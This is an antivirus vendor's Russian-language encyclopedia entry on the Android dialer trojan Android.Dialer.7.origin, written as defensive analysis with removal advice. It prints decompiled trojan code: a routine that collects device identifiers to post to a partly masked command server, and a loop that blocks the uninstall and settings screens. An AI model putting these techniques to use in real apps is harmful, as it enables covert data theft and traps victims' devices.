Защити созданное

Другие наши ресурсы

  • free.drweb.kz — бесплатные утилиты, плагины, информеры
  • av-desk.com — интернет-сервис для поставщиков услуг Dr.Web AV-Desk
  • curenet.drweb.kz — сетевая лечащая утилита Dr.Web CureNet!
Закрыть

Библиотека
Моя библиотека

Чтобы добавить ресурс в библиотеку, войдите в аккаунт.

+ Добавить в библиотеку

Ресурсов: -

Последний: -

Моя библиотека

Поддержка
Круглосуточная поддержка | Правила обращения

Позвоните

Глобальная поддержка:
+7 (495) 789-45-86

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Глобальная поддержка:
+7 (495) 789-45-86

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Android.Dialer.7.origin

Добавлен в вирусную базу Dr.Web: 2015-03-18

Описание добавлено:

Вредоносная программа-дозвонщик, скрытно совершающая звонки на различные телефонные номера. Может распространяться под видом приложения категории «для взрослых».

Установка и запуск

При установке на мобильное Android-устройство Android.Dialer.7.origin помещает на главный экран операционной системы пустой ярлык, не имеющий собственного изображения-иконки, а также подписи. После запуска троянца этот ярлык удаляется.

screen

В ряде случаев после своего запуска Android.Dialer.7.origin может продемонстрировать сообщение об ошибке доступа к запрошенной услуге:

screen

Вредоносная деятельность

Троянец функционирует на зараженном мобильном устройстве в качестве системного сервиса, который активируется как при нажатии пользователем на ярлык, принадлежащий вредоносной программе, так и автоматически, при срабатывании ряда системных событий:

<action android:name="android.intent.action.USER_PRESENT" />
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.BATTERY_OKAY" />
<action android:name="android.intent.action.BATTERY_LOW" />
<action android:name="android.intent.action.ACTION_POWER_CONNECTED" />
<action android:name="android.intent.action.ACTION_POWER_DISCONNECTED" />

С определенной периодичностью этот сервис осуществляет звонки на номер 803402470, указанный в настройках Android.Dialer.7.origin, однако троянец способен совершать соединение и с другими номерами, получая информацию о них с управляющего сервера, расположенного по адресу http://api.[xxx]aly.com. Дозвонщик может отправлять различные post-запросы на этот сервер, соединяясь со следующими веб-адресами:

  • http://api.[xxx]aly.com/ws/install/
  • http://api.[xxx]aly.com/ws/event/
  • http://api.[xxx]aly.com/ws/status/
  • http://api.[xxx]aly.com/ws/update/

Каждый из этих post-запросов содержат определенные параметры. Например, запрос по адресу http://api.[xxx]aly.com/ws/install/ выглядит следующим образом:


((List)v0).add(new BasicNameValuePair("av", g.a(String.valueOf(Build$VERSION.SDK_INT))));
  ((List)v0).add(new BasicNameValuePair("vc", g.a(g.e(this.a))));
  ((List)v0).add(new BasicNameValuePair("vn", g.a(g.f(this.a))));
  ((List)v0).add(new BasicNameValuePair("idpro", g.a(MyApplication.j())));
  ((List)v0).add(new BasicNameValuePair("aid", g.a(g.a(this.a))));
  ((List)v0).add(new BasicNameValuePair("ta", g.a(g.b(this.a))));
  ((List)v0).add(new BasicNameValuePair("de", g.a(g.c(this.a))));
  ((List)v0).add(new BasicNameValuePair("op", g.a(g.d(this.a))));
  ((List)v0).add(new BasicNameValuePair("guid", g.a(g.a())));
  ((List)v0).add(new BasicNameValuePair("name", g.a(this.a.getPackageName())));
  ((List)v0).add(new BasicNameValuePair("md", g.a(Build.MODEL)));
  ((List)v0).add(new BasicNameValuePair("ct", g.a(g.g(this.a))));
  ((List)v0).add(new BasicNameValuePair("ref",
     g.a(MyApplication.a.getString("referrer", "0"))));

В ответ на отправленный запрос Android.Dialer.7.origin может получить ответ в формате json (JavaScript Object Notation), содержащий новый номер, с которым требуется установить телефонное соединение.

Троянец скрывает свою вредоносную деятельность, удаляя всю информацию о выполненных вызовах из журнала звонков, а также системных логов.

Противодействие удалению

Android.Dialer.7.origin обладает весьма эффективным механизмом защиты против своего удаления. Каждые 0,5 секунды троянец проверяет, запущен ли раздел системных параметров, ответственный за управление приложениями и, если это так, возвращает пользователя к главному экрану операционной системы, не давая выполнить никаких действий с установленными программами:


public final void a(Context arg6) {
        List v1 = arg6.getSystemService("activity").getRunningTasks(1);
        String v2 = v1.get(0).topActivity.getClassName();
        v1.get(0).topActivity.getPackageName().getClass();
        new StringBuilder("VISTA ES:").append(v1.get(0).topActivity.getClassName()).toString();
        if((v2.equals("com.android.packageinstaller.UninstallerActivity")) ||
(v2.equals("com.sec.android.app.controlpanel.activity.JobManagerActivity"))
                 || (v2.equals("com.android.settings.SubSettings")) ||
(v2.equals("com.android.settings.applications.RunningServiceDetails"))
                 || (v2.equals("com.android.settings.RunningServices")) ||
(v2.equals("com.android.settings.ManageApplications"))
                 || (v2.equals("com.android.settings.applications.InstalledAppDetails")) 
                 || (v2.equals("com.android.packageinstaller.PackageInstallerActivity"))) {
            Intent v0 = new Intent();
            v0.addFlags(268435456);
            v0.setAction("android.intent.action.MAIN");
            v0.addCategory("android.intent.category.HOME");
            this.c.startActivity(v0);
        }
    }

Рекомендации по лечению


Android

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке